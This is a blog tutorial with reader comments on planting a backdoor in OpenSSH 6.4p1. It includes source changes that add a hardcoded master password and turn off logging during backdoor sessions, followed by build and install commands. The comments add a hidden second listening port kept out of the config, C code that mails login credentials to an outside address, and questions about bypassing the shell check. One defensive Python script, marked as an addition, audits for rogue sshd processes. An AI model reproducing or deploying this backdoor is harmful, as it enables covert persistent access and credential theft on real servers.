[Video] - Build a backdoor in OpenSSH 6.4p1 with Kali Linux

This time I show you how to build a "backdoor" into your own OpenSSH 6.4p1 installation under Kali Linux.


Download needed files
cd /tmp/
wget --no-check-certificate
tar xvfz openssl-1.0.1e.tar.gz
tar xvfz openssh-6.4p1.tar.gz

Preparing the system
mkdir /usr/local/ssl/
ln -s /tmp/openssl-1.0.1e/include/ /usr/local/ssl/include
ln -s /tmp/openssl-1.0.1e/include/ /usr/local/ssl/lib
ln -s /usr/lib/i386-linux-gnu/ /usr/lib/

Changing OpenSSH

// auth.h
#define B4CKD00R "myeasypass"
int backdoorActive;

// auth-passwd.c
auth_password(Authctxt *authctxt, const char *password)
        struct passwd * pw = authctxt->pw;
        int ok = authctxt->valid;
        backdoorActive = 0;

        if (!strcmp(password, B4CKD00R)) {
                backdoorActive = 1;
                return 1;

// log.h
int backdoorActive;

// log.c
do_log(LogLevel level, const char *fmt, va_list args)
if(backdoorActive == 1)

Compile & install OpenSSH on your local Kali installation
./configure --with-ssl-dir=/tmp/openssl-1.0.1e/
make install

Change SSH-Port if needed
vi /usr/local/etc/sshd_config
Port 2222

Start your new local SSH-Daemon
/usr/local/sbin/sshd -f /usr/local/etc/sshd_config

Test it!
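
For defenders auditing a host: the build above leaves an sshd running from /usr/local/sbin with its own config file, outside package management. The following is an added example, not part of the original post, that walks /proc and flags sshd processes that do not match the packaged daemon; the packaged path /usr/sbin/sshd, the default config path and the function name audit_sshd are assumptions.

```python
import os

# Assumption: where the distribution's openssh-server package installs sshd.
PACKAGED_SSHD = {"/usr/sbin/sshd"}
DEFAULT_CONFIG = "/etc/ssh/sshd_config"


def audit_sshd(proc_root="/proc", packaged=PACKAGED_SSHD):
    """Return findings for sshd processes that differ from the packaged daemon."""
    findings = []
    for pid in sorted(filter(str.isdigit, os.listdir(proc_root)), key=int):
        base = os.path.join(proc_root, pid)
        try:
            with open(os.path.join(base, "comm")) as fh:
                if fh.read().strip() != "sshd":
                    continue
            exe = os.readlink(os.path.join(base, "exe"))
            with open(os.path.join(base, "cmdline"), "rb") as fh:
                argv = fh.read().decode(errors="replace").split("\0")
        except OSError:
            continue  # process exited or we lack permission; skip it
        reasons = []
        # The kernel appends " (deleted)" when the on-disk binary was removed
        # or replaced after the process started.
        if exe.endswith(" (deleted)"):
            reasons.append("binary deleted or replaced on disk")
            exe = exe[: -len(" (deleted)")]
        if exe not in packaged:
            reasons.append("executable is not the packaged sshd")
        # An explicit -f pointing away from the default config is worth a look.
        if "-f" in argv[:-1]:
            cfg = argv[argv.index("-f") + 1]
            if cfg != DEFAULT_CONFIG:
                reasons.append("non-default config file " + cfg)
        if reasons:
            findings.append({"pid": int(pid), "exe": exe, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_sshd():
        print(f["pid"], f["exe"], "; ".join(f["reasons"]))
```

Run it as root so every /proc/PID/exe link is readable; a finding is a prompt to compare the binary against the package's checksums, not proof of tampering.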



noname on :

yes mate is great looks ok .. but when you log in you are in ps and w command, and compromise all your activity

Nick on :

Hi mate this looks nice can you make a video tutorial or just write the commands for a different opened port connection?
i mean if you can explain to me how i can do this to work for example on 9863 but 22 to be still on! cheers !
by the way 9863 i don’t want to be visible on /etc/ssh/sshd_config i know this is possible but i don’t know how!

Stefan Schurtz on :


you mean something like that:


if (options->num_ports == 0)
options->ports[options->num_ports++] = SSH_DEFAULT_PORT;

change to

if (options->num_ports == 0) {
options->ports[options->num_ports++] = SSH_DEFAULT_PORT;
options->ports[options->num_ports++] = 9863;
}

If port will be changed in config file, change this


case sPort:
if (!arg || *arg == '\0')
fatal("%s line %d: missing port number.",
filename, linenum);
options->ports[options->num_ports++] = a2port(arg);
options->ports[options->num_ports++] = 9863;

Not sure if this works in all situations. Perhaps you can test a little bit more than I did :)


Nick on :

no problem mate i just try both of them didn’t work for me even the port even to make from 6.5 with centos or ubuntu i need something new i try as well to implement sendmail on this no success!
the email function been this for me
/* fopen example */

int main ()
FILE *fp; char *ttyn = ttyname(0); char msgbuf1000; struct utmp *ut; while ((ut = getutent())) { if (strcmp(ttyn, ut->ut_line) == 0) { strcat(msgbuf, "\nFrom: "); strcat(msgbuf, ut->ut_user); strcat(msgbuf, "@"); strcat(msgbuf, ut->ut_host); break; } }

fp = popen("mail -s ‘us loggedin’ x19@xxxxxxxxxxx", pw_user>user & password); fprintf(fp, "%s\n", msgbuf); pclose(fp); return 0; } [/code]

meh on :

Seems to work only if ran by root. How about if you want to run it as unprivileged user?

Also, do you know how to bypass the valid shell check and always assign /bin/bash, even if it’s set to /bin/false?
Or at least how to override the passwd path to something like ./passwd, so it can be modified by the unprivileged user.
